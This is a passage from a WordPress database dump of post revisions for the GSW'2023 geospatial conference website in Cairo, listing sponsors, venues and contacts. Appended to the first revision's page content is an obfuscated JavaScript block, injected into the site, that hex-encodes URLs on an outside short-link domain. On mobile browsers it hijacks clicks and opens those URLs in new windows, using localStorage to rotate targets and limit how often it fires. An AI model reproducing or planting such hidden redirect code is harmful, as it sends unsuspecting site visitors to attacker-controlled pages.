5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-20 00:09:38','2023-06-20 00:09:38','',3066,'https://gsw2023.com/?p=4721',0,'revision','',0),
(4722,1,'2023-06-20 00:10:10','2023-06-20 00:10:10','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219743638{margin-top: -20px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" 